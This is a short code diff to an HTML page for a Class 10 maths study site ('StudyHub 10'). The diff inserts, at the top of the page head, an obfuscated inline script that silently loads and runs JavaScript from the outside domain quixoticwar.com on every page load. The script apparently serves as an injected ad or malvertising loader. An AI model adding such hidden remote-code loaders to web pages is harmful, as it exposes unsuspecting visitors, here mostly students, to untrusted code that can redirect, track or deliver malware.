--- a/class10thmaths.html
+++ b/class10thmaths.html
@@ -2,6 +2,18 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <script>
+(function(xxuvy){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = xxuvy || {};
+s.src = "\/\/quixoticwar.com\/bWX.V\/swd\/GslD0tYrW\/cw\/kepmo9NuZZhULlFkAP-TNY-3\/NxTkMP2sNrTUY\/tINvjmcu1XM\/zQYO1ANJwi";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Class 10 Maths Chapters | StudyHub 10</title>
@@ -107,6 +119,7 @@ This content is protected under Indian Copyright Law.
 For personal educational use only. No reproduction or distribution without permission.</footer>
 </body>
 </html>
+
 
 
 
